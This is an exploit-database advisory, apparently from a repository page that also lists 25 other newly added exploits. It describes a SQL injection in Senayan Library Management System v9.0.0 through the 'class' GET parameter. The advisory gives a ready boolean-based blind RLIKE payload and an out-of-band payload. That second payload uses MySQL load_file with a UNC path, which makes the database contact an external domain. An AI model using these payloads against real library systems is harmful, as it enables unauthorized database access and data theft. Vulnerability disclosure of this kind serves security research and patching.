9b56e8731e
25 changes to exploits/shellcodes/ghdb EQ Enterprise management system v2.2.0 - SQL Injection qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) ASKEY RTF3505VW-N1 - Privilege Escalation Bangresto 1.0 - SQL Injection Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) Cacti v1.2.22 - Remote Command Execution (RCE) Judging Management System v1.0 - Authentication Bypass Judging Management System v1.0 - Remote Code Execution (RCE) rconfig 3.9.7 - Sql Injection (Authenticated) Senayan Library Management System v9.0.0 - SQL Injection Spitfire CMS 1.0.475 - PHP Object Injection Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) WooCommerce v7.1.0 - Remote Code Execution(RCE) CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset SOUND4 Server Service 4.1.102 - Local Privilege Escalation macOS/x64 - Execve Null-Free Shellcode
62 lines
No EOL
2.1 KiB
Text
62 lines
No EOL
2.1 KiB
Text
## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection
|
|
## Author: nu11secur1ty
|
|
## Date: 11.09.2022
|
|
## Vendor: https://slims.web.id/web/
|
|
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
|
|
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi
|
|
|
|
## Description:
|
|
The manual insertion `point 3` with `class` parameter appears to be
|
|
vulnerable to SQL injection attacks.
|
|
The payload '+(select
|
|
load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'
|
|
was submitted in the manual insertion point 3.
|
|
This payload injects a SQL sub-query that calls MySQL's load_file
|
|
function with a UNC file path that references a URL on an external
|
|
domain.
|
|
The application interacted with that domain, indicating that the
|
|
injected SQL query was executed.
|
|
|
|
## STATUS: HIGH Vulnerability
|
|
|
|
[+] Payload:
|
|
|
|
```MySQL
|
|
---
|
|
Parameter: class (GET)
|
|
Type: boolean-based blind
|
|
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
|
|
or GROUP BY clause
|
|
Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT
|
|
(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND
|
|
'dLjf'='dLjf&membershipType=a&collType=aaaa
|
|
---
|
|
```
|
|
|
|
## Reproduce:
|
|
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)
|
|
|
|
## Proof and Exploit:
|
|
[href](http://localhost:5001/sy5wji)
|
|
|
|
## Time spent
|
|
`03:00:00`
|
|
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at
|
|
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
|
|
https://www.exploit-db.com/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/>
|
|
|
|
|
|
--
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
Exploit developer at https://packetstormsecurity.com/
|
|
https://cve.mitre.org/index.html and https://www.exploit-db.com/
|
|
home page: https://www.nu11secur1ty.com/
|
|
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
|
nu11secur1ty <http://nu11secur1ty.com/> |